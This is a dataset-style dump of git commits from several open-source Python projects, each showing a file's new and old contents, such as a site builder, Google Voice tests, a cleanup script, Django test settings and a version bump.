vector = create_vector(source.astype(np.float64), reference.astype(np.float64), mask, multiplier=gradient_multiplier)
x0 = source[indices].astype('float64')
pixels = np.round(solver.solve(b=vector, x0=x0, tol=1e-03, accel='cg'))
# TODO: Add dtype min/max parameter
arr = np.zeros_like(source)
arr[indices] = np.clip(pixels, 0, 4095)
return arr | mit | Python |
d16f2cd7cdacf5897ba21f2ea92d65724e56e377 | Add TODOs to build. | joeyespo/gitpress | gitpress/building.py | gitpress/building.py | import os
from .repository import require_repo, presentation_files
from .helpers import copy_files, remove_directory
default_out_directory = '_site'
def build(directory=None, out_directory=None):
"""Builds the site from its content and presentation repository."""
directory = directory or '.'
out_directory = os.path.abspath(out_directory or default_out_directory)
repo = require_repo(directory)
# Prevent user mistakes
if out_directory == '.':
raise ValueError('Output directory must be different than the source directory: ' + repr(out_directory))
if os.path.basename(os.path.relpath(out_directory, directory)) == '..':
raise ValueError('Output directory must not contain the source directory: ' + repr(out_directory))
# TODO: read config
# TODO: use virtualenv
# TODO: init and run plugins
# TODO: process with active theme
# Collect and copy static files
files = presentation_files(repo)
remove_directory(out_directory)
copy_files(files, out_directory, repo)
return out_directory
| import os
from .repository import require_repo, presentation_files
from .helpers import copy_files, remove_directory
default_out_directory = '_site'
def build(directory=None, out_directory=None):
"""Builds the site from its content and presentation repository."""
directory = directory or '.'
out_directory = os.path.abspath(out_directory or default_out_directory)
repo = require_repo(directory)
# Prevent user mistakes
if out_directory == '.':
raise ValueError('Output directory must be different than the source directory: ' + repr(out_directory))
if os.path.basename(os.path.relpath(out_directory, directory)) == '..':
raise ValueError('Output directory must not contain the source directory: ' + repr(out_directory))
# TODO: read config
# TODO: process themes
# Collect and copy static files
files = presentation_files(repo)
remove_directory(out_directory)
copy_files(files, out_directory, repo)
return out_directory
| mit | Python |
e51fd2045565a3cd6897cfe843ecd2746cc687dd | Fix ImportErrors on Python 3 | pettazz/pygooglevoice | googlevoice/tests.py | googlevoice/tests.py | import os
from unittest import TestCase, main
from six.moves import input
from googlevoice import Voice
from googlevoice import conf
class VoiceTest(TestCase):
voice = Voice()
voice.login()
outgoing = input('Outgoing number (blank to ignore call tests): ')
forwarding = None
if outgoing:
forwarding = input('Forwarding number [optional]: ') or None
if outgoing:
def test_1call(self):
self.voice.call(self.outgoing, self.forwarding)
def test_sms(self):
self.voice.send_sms(self.outgoing, 'i sms u')
def test_2cancel(self):
self.voice.cancel(self.outgoing, self.forwarding)
def test_special(self):
self.assert_(self.voice.special)
def test_inbox(self):
self.assert_(self.voice.inbox)
def test_balance(self):
self.assert_(self.voice.settings['credits'])
def test_search(self):
self.assert_(len(self.voice.search('joe')))
def test_disable_enable(self):
self.voice.phones[0].disable()
self.voice.phones[0].enable()
def test_download(self):
msg = list(self.voice.voicemail.messages)[0]
fn = '%s.mp3' % msg.id
if os.path.isfile(fn):
os.remove(fn)
self.voice.download(msg)
self.assert_(os.path.isfile(fn))
def test_zlogout(self):
self.voice.logout()
self.assert_(self.voice.special is None)
def test_config(self):
self.assert_(conf.config.forwardingNumber)
self.assert_(str(conf.config.phoneType) in '1237')
self.assertEqual(conf.config.get('wtf'), None)
if __name__ == '__main__':
main()
| import os
from unittest import TestCase, main
from six.moves import input
from googlevoice import Voice
class VoiceTest(TestCase):
voice = Voice()
voice.login()
outgoing = input('Outgoing number (blank to ignore call tests): ')
forwarding = None
if outgoing:
forwarding = input('Forwarding number [optional]: ') or None
if outgoing:
def test_1call(self):
self.voice.call(self.outgoing, self.forwarding)
def test_sms(self):
self.voice.send_sms(self.outgoing, 'i sms u')
def test_2cancel(self):
self.voice.cancel(self.outgoing, self.forwarding)
def test_special(self):
self.assert_(self.voice.special)
def test_inbox(self):
self.assert_(self.voice.inbox)
def test_balance(self):
self.assert_(self.voice.settings['credits'])
def test_search(self):
self.assert_(len(self.voice.search('joe')))
def test_disable_enable(self):
self.voice.phones[0].disable()
self.voice.phones[0].enable()
def test_download(self):
msg = list(self.voice.voicemail.messages)[0]
fn = '%s.mp3' % msg.id
if os.path.isfile(fn):
os.remove(fn)
self.voice.download(msg)
self.assert_(os.path.isfile(fn))
def test_zlogout(self):
self.voice.logout()
self.assert_(self.voice.special is None)
def test_config(self):
from conf import config
self.assert_(config.forwardingNumber)
self.assert_(str(config.phoneType) in '1237')
self.assertEqual(config.get('wtf'), None)
if __name__ == '__main__':
main()
| bsd-3-clause | Python |
a32cc7a92f4bb3fb6531fbd0d2afe436c8b02ee7 | Make cleaner actually run | mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge | srcleaner.py | srcleaner.py | #!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import logging
import os
import shutil
import stoneridge
@stoneridge.main
def main():
"""A simple cleanup program for stone ridge that blows away the working
directory
"""
parser = stoneridge.TestRunArgumentParser()
parser.parse_args()
logging.debug('cleaner running')
workdir = stoneridge.get_config('run', 'work')
xpcoutdir = stoneridge.get_xpcshell_output_directory()
if workdir and os.path.exists(workdir):
logging.debug('removing workdir %s' % (workdir,))
shutil.rmtree(workdir)
if xpcoutdir and os.path.exists(xpcoutdir):
logging.debug('removing xpcshell output directory %s' %
(xpcoutdir,))
shutil.rmtree(xpcoutdir)
| #!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import logging
import os
import shutil
import stoneridge
@stoneridge.main
def main():
"""A simple cleanup program for stone ridge that blows away the working
directory
"""
parser = stoneridge.TestRunArgumentParser()
parser.parse_args()
logging.debug('cleaner running')
parser = stoneridge.ArgumentParser()
parser.parse_args()
workdir = stoneridge.get_config('run', 'work')
xpcoutdir = stoneridge.get_xpcshell_output_directory()
if workdir and os.path.exists(workdir):
logging.debug('removing workdir %s' % (workdir,))
shutil.rmtree(workdir)
if xpcoutdir and os.path.exists(xpcoutdir):
logging.debug('removing xpcshell output directory %s' %
(xpcoutdir,))
shutil.rmtree(xpcoutdir)
| mpl-2.0 | Python |
96e7c4da370ae306e760789a874c238374b03508 | Fix styling | untitaker/vdirsyncer,untitaker/vdirsyncer,untitaker/vdirsyncer | tests/unit/cli/test_config.py | tests/unit/cli/test_config.py | import os
from vdirsyncer.cli.config import _resolve_conflict_via_command
from vdirsyncer.utils.vobject import Item
def test_conflict_resolution_command():
def check_call(command):
command, a_tmp, b_tmp = command
assert command == os.path.expanduser('~/command')
with open(a_tmp) as f:
assert f.read() == a.raw
with open(b_tmp) as f:
assert f.read() == b.raw
with open(b_tmp, 'w') as f:
f.write(a.raw)
a = Item('UID:AAAAAAA')
b = Item('UID:BBBBBBB')
assert _resolve_conflict_via_command(
a, b, ['~/command'], 'a', 'b',
_check_call=check_call
).raw == a.raw
| import os
from vdirsyncer.cli.config import _resolve_conflict_via_command
from vdirsyncer.utils.vobject import Item
def test_conflict_resolution_command():
def check_call(command):
command, a_tmp, b_tmp = command
assert command == os.path.expanduser('~/command')
with open(a_tmp) as f:
assert f.read() == a.raw
with open(b_tmp) as f:
assert f.read() == b.raw
with open(b_tmp, 'w') as f:
f.write(a.raw)
a = Item('UID:AAAAAAA')
b = Item('UID:BBBBBBB')
assert _resolve_conflict_via_command(
a, b, ['~/command'], 'a', 'b',
_check_call=check_call
).raw == a.raw
| mit | Python |
20c241a912ed37fea5bdfa89c9c2e3fb4d9112e6 | set timtec theme | mupi/timtec,virgilio/timtec,virgilio/timtec,hacklabr/timtec,virgilio/timtec,GustavoVS/timtec,AllanNozomu/tecsaladeaula,GustavoVS/timtec,hacklabr/timtec,AllanNozomu/tecsaladeaula,GustavoVS/timtec,AllanNozomu/tecsaladeaula,mupi/timtec,GustavoVS/timtec,virgilio/timtec,hacklabr/timtec,mupi/tecsaladeaula,mupi/timtec,mupi/tecsaladeaula,AllanNozomu/tecsaladeaula,mupi/tecsaladeaula,mupi/timtec,hacklabr/timtec,mupi/tecsaladeaula | timtec/settings_local_test.py | timtec/settings_local_test.py | # -*- coding: utf-8 -*-
# configurations for the test server
# https://docs.djangoproject.com/en/dev/ref/settings/
DEBUG = False
TEMPLATE_DEBUG = DEBUG
SITE_ID = 1
ALLOWED_HOSTS = [
'timtec-test.hacklab.com.br',
'.timtec.com.br',
]
TIMTEC_THEME = 'timtec'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'timtec-test',
'USER': 'timtec-test',
}
}
MEDIA_ROOT = "/home/timtec-test/webfiles/media/"
STATIC_ROOT = "/home/timtec-test/webfiles/static/"
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_SUBJECT_PREFIX = '[timtec-test]'
DEFAULT_FROM_EMAIL = 'donotreply-test@m.timtec.com.br'
CONTACT_RECIPIENT_LIST = ['timtec-dev@listas.hacklab.com.br', ]
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| # -*- coding: utf-8 -*-
# configurations for the test server
# https://docs.djangoproject.com/en/dev/ref/settings/
DEBUG = False
TEMPLATE_DEBUG = DEBUG
SITE_ID = 1
ALLOWED_HOSTS = [
'timtec-test.hacklab.com.br',
'.timtec.com.br',
]
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'timtec-test',
'USER': 'timtec-test',
}
}
MEDIA_ROOT = "/home/timtec-test/webfiles/media/"
STATIC_ROOT = "/home/timtec-test/webfiles/static/"
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_SUBJECT_PREFIX = '[timtec-test]'
DEFAULT_FROM_EMAIL = 'donotreply-test@m.timtec.com.br'
CONTACT_RECIPIENT_LIST = ['timtec-dev@listas.hacklab.com.br', ]
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| agpl-3.0 | Python |
1a5626e545b8483192d93ea57572da097a28e328 | Update version 0.7.8 -> 0.7.9 | oneklc/dimod,oneklc/dimod | dimod/package_info.py | dimod/package_info.py | # Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
__version__ = '0.7.9'
__author__ = 'D-Wave Systems Inc.'
__authoremail__ = 'acondello@dwavesys.com'
__description__ = 'A shared API for binary quadratic model samplers.'
| # Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
__version__ = '0.7.8'
__author__ = 'D-Wave Systems Inc.'
__authoremail__ = 'acondello@dwavesys.com'
__description__ = 'A shared API for binary quadratic model samplers.'
| apache-2.0 | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.